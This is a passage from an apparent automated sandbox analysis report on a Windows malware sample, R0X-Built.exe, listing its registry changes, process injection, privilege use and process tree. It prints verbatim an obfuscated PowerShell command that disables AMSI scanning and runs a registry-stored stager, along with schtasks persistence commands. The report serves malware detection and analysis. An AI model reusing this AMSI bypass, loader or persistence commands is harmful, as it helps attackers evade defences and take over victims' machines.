\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\363f95ea-4784-4ec5 = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c9166f7d-ca3b-41a6 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b6420cbb-1deb-4e02 = 5eb441b0d39cda01 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9303fc52-351a-4d35 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d7512ea-4e64-485a RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\55d6e340-05c6-4c91 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1311bad5-54fb-4f0d = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1500 powershell.EXE 1500 powershell.EXE 1500 powershell.EXE 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3852 $srr-powershell.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 4168 wmiprvse.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3852 $srr-powershell.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3852 $srr-powershell.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3852 $srr-powershell.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe 3904 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2952 R0X-Built.exe Token: SeDebugPrivilege 1500 powershell.EXE Token: SeDebugPrivilege 3852 $srr-powershell.exe Token: SeDebugPrivilege 1500 powershell.EXE Token: SeDebugPrivilege 3904 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2444 svchost.exe Token: SeIncreaseQuotaPrivilege 2444 svchost.exe Token: SeSecurityPrivilege 2444 svchost.exe Token: SeTakeOwnershipPrivilege 2444 svchost.exe Token: SeLoadDriverPrivilege 2444 svchost.exe Token: SeSystemtimePrivilege 2444 svchost.exe Token: SeBackupPrivilege 2444 svchost.exe Token: SeRestorePrivilege 2444 svchost.exe Token: SeShutdownPrivilege 2444 svchost.exe Token: SeSystemEnvironmentPrivilege 2444 svchost.exe Token: SeUndockPrivilege 2444 svchost.exe Token: SeManageVolumePrivilege 2444 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2444 svchost.exe Token: SeIncreaseQuotaPrivilege 2444 svchost.exe Token: SeSecurityPrivilege 2444 svchost.exe Token: SeTakeOwnershipPrivilege 2444 svchost.exe Token: SeLoadDriverPrivilege 2444 svchost.exe Token: SeSystemtimePrivilege 2444 svchost.exe Token: SeBackupPrivilege 2444 svchost.exe Token: SeRestorePrivilege 2444 svchost.exe Token: SeShutdownPrivilege 2444 svchost.exe Token: SeSystemEnvironmentPrivilege 2444 svchost.exe Token: SeUndockPrivilege 2444 svchost.exe Token: SeManageVolumePrivilege 2444 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2444 svchost.exe Token: SeIncreaseQuotaPrivilege 2444 svchost.exe Token: SeSecurityPrivilege 2444 svchost.exe Token: SeTakeOwnershipPrivilege 2444 svchost.exe Token: SeLoadDriverPrivilege 2444 svchost.exe Token: SeSystemtimePrivilege 2444 svchost.exe Token: SeBackupPrivilege 2444 svchost.exe Token: SeRestorePrivilege 2444 svchost.exe Token: SeShutdownPrivilege 2444 svchost.exe Token: SeSystemEnvironmentPrivilege 2444 svchost.exe Token: SeUndockPrivilege 2444 svchost.exe Token: SeManageVolumePrivilege 2444 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2444 svchost.exe Token: SeIncreaseQuotaPrivilege 2444 svchost.exe Token: SeSecurityPrivilege 2444 svchost.exe Token: SeTakeOwnershipPrivilege 2444 svchost.exe Token: SeLoadDriverPrivilege 2444 svchost.exe Token: SeSystemtimePrivilege 2444 svchost.exe Token: SeBackupPrivilege 2444 svchost.exe Token: SeRestorePrivilege 2444 svchost.exe Token: SeShutdownPrivilege 2444 svchost.exe Token: SeSystemEnvironmentPrivilege 2444 svchost.exe Token: SeUndockPrivilege 2444 svchost.exe Token: SeManageVolumePrivilege 2444 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2444 svchost.exe Token: SeIncreaseQuotaPrivilege 2444 svchost.exe Token: SeSecurityPrivilege 2444 svchost.exe Token: SeTakeOwnershipPrivilege 2444 svchost.exe Token: SeLoadDriverPrivilege 2444 svchost.exe Token: SeSystemtimePrivilege 2444 svchost.exe Token: SeBackupPrivilege 2444 svchost.exe Token: SeRestorePrivilege 2444 svchost.exe Token: SeShutdownPrivilege 2444 svchost.exe Token: SeSystemEnvironmentPrivilege 2444 svchost.exe Token: SeUndockPrivilege 2444 svchost.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 4728 RuntimeBroker.exe 3516 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2952 wrote to memory of 5076 2952 R0X-Built.exe 88 PID 2952 wrote to memory of 5076 2952 R0X-Built.exe 88 PID 2952 wrote to memory of 5076 2952 R0X-Built.exe 88 PID 2952 wrote to memory of 3852 2952 R0X-Built.exe 90 PID 2952 wrote to memory of 3852 2952 R0X-Built.exe 90 PID 2952 wrote to memory of 3852 2952 R0X-Built.exe 90 PID 2952 wrote to memory of 3968 2952 R0X-Built.exe 91 PID 2952 wrote to memory of 3968 2952 R0X-Built.exe 91 PID 2952 wrote to memory of 3968 2952 R0X-Built.exe 91 PID 2952 wrote to memory of 2264 2952 R0X-Built.exe 92 PID 2952 wrote to memory of 2264 2952 R0X-Built.exe 92 PID 2952 wrote to memory of 2264 2952 R0X-Built.exe 92 PID 3852 wrote to memory of 3120 3852 $srr-powershell.exe 98 PID 3852 wrote to memory of 3120 3852 $srr-powershell.exe 98 PID 3852 wrote to memory of 3120 3852 $srr-powershell.exe 98 PID 1500 wrote to memory of 3904 1500 powershell.EXE 103 PID 1500 wrote to memory of 3904 1500 powershell.EXE 103 PID 1500 wrote to memory of 3904 1500 powershell.EXE 103 PID 1500 wrote to memory of 3904 1500 powershell.EXE 103 PID 1500 wrote to memory of 3904 1500 powershell.EXE 103 PID 1500 wrote to memory of 3904 1500 powershell.EXE 103 PID 1500 wrote to memory of 3904 1500 powershell.EXE 103 PID 1500 wrote to memory of 3904 1500 powershell.EXE 103 PID 3904 wrote to memory of 612 3904 dllhost.exe 5 PID 3904 wrote to memory of 672 3904 dllhost.exe 7 PID 3904 wrote to memory of 944 3904 dllhost.exe 12 PID 3904 wrote to memory of 64 3904 dllhost.exe 13 PID 3904 wrote to memory of 436 3904 dllhost.exe 14 PID 3904 wrote to memory of 868 3904 dllhost.exe 16 PID 3904 wrote to memory of 1080 3904 dllhost.exe 17 PID 3904 wrote to memory of 1092 3904 dllhost.exe 18 PID 3904 wrote to memory of 1100 3904 dllhost.exe 19 PID 3904 wrote to memory of 1108 3904 dllhost.exe 20 PID 3904 wrote to memory of 1252 3904 dllhost.exe 21 PID 3904 wrote to memory of 1264 3904 dllhost.exe 22 PID 3904 wrote to memory of 1336 3904 dllhost.exe 23 PID 3904 wrote to memory of 1440 3904 dllhost.exe 24 PID 3904 wrote to memory of 1448 3904 dllhost.exe 25 PID 3904 wrote to memory of 1488 3904 dllhost.exe 26 PID 3904 wrote to memory of 1556 3904 dllhost.exe 27 PID 3904 wrote to memory of 1568 3904 dllhost.exe 28 PID 3904 wrote to memory of 1636 3904 dllhost.exe 29 PID 3904 wrote to memory of 1664 3904 dllhost.exe 30 PID 3904 wrote to memory of 1744 3904 dllhost.exe 31 PID 3904 wrote to memory of 1752 3904 dllhost.exe 32 PID 3904 wrote to memory of 1856 3904 dllhost.exe 33 PID 3904 wrote to memory of 1864 3904 dllhost.exe 34 PID 3904 wrote to memory of 1900 3904 dllhost.exe 35 PID 3904 wrote to memory of 1948 3904 dllhost.exe 36 PID 3904 wrote to memory of 2028 3904 dllhost.exe 37 PID 3904 wrote to memory of 2124 3904 dllhost.exe 39 PID 3904 wrote to memory of 2172 3904 dllhost.exe 40 PID 3904 wrote to memory of 2444 3904 dllhost.exe 41 PID 3904 wrote to memory of 2472 3904 dllhost.exe 42 PID 3904 wrote to memory of 2480 3904 dllhost.exe 43 PID 3904 wrote to memory of 2516 3904 dllhost.exe 44 PID 3904 wrote to memory of 2600 3904 dllhost.exe 45 PID 3904 wrote to memory of 2608 3904 dllhost.exe 46 PID 3904 wrote to memory of 2664 3904 dllhost.exe 47 PID 3904 wrote to memory of 2672 3904 dllhost.exe 48 PID 3904 wrote to memory of 2720 3904 dllhost.exe 49 PID 3904 wrote to memory of 2728 3904 dllhost.exe 50 PID 3904 wrote to memory of 2972 3904 dllhost.exe 51 PID 3904 wrote to memory of 3020 3904 dllhost.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:64
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f3794619-ff5d-4f99-b6e1-d0bfb4296e1f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3904
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1080 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lHnDcqkRavnx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xMOjPktArhwozm,[Parameter(Position=1)][Type]$jqfAOfzuQd)$sBRTVTZegeY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'fle'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+'l'+'e'+'g'+[Char](97)+''+'t'+'eT'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+','+''+[Char](80)+'ub'+'l'+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+'n'+[Char](115)+''+'i'+'Clas'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sBRTVTZegeY.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'N'+[Char](97)+'m'+'e'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+'P'+'u'+'b'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$xMOjPktArhwozm).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$sBRTVTZegeY.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+'By'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+'lo'+'t'+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$jqfAOfzuQd,$xMOjPktArhwozm).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');Write-Output $sBRTVTZegeY.CreateType();}$QvWJDFkxXtmcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+'m.d'+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+'sa'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+'ho'+'d'+''+'s'+'');$MgRjzTwuCDFbqB=$QvWJDFkxXtmcT.GetMethod(''+'G'+'etP'+[Char](114)+'oc'+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+'a'+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hTyuozmqqZEIdcIummK=lHnDcqkRavnx @([String])([IntPtr]);$nuArrFqKszkGHJRWPhycKX=lHnDcqkRavnx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DNquEtLUrwd=$QvWJDFkxXtmcT.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+'d'+''+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+'l')));$fYADWJURUTYWFx=$MgRjzTwuCDFbqB.Invoke($Null,@([Object]$DNquEtLUrwd,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+[Char](121)+''+'A'+'')));$GeJgNYcgDxvOVSbIV=$MgRjzTwuCDFbqB.Invoke($Null,@([Object]$DNquEtLUrwd,[Object]('V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$hEiqFbD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fYADWJURUTYWFx,$hTyuozmqqZEIdcIummK).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$hhDPywCvmkfugrxLY=$MgRjzTwuCDFbqB.Invoke($Null,@([Object]$hEiqFbD,[Object](''+'A'+''+'m'+'s'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$YTktZPHseQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GeJgNYcgDxvOVSbIV,$nuArrFqKszkGHJRWPhycKX).Invoke($hhDPywCvmkfugrxLY,[uint32]8,4,[ref]$YTktZPHseQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hhDPywCvmkfugrxLY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GeJgNYcgDxvOVSbIV,$nuArrFqKszkGHJRWPhycKX).Invoke($hhDPywCvmkfugrxLY,[uint32]8,0x20,[ref]$YTktZPHseQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1500
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1252
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2600
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1264
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1568
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1900
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1948
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2124
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2664
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3020
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3412
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:5076
-
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:3120
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:3968
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2264
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3636
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3820
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3976
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4140
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:60
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4560
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4160
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1780
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:620
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4728
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵PID:4480
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:2828
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4168
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 2358757f7f9a594ee3983502430178ab 7hZVnxYZ90WQ6lZLsSYOIQ.0.1.0.0.01⤵
- Sets service image path in registry
PID:5016 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2400
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:2212
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2016
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3196
-
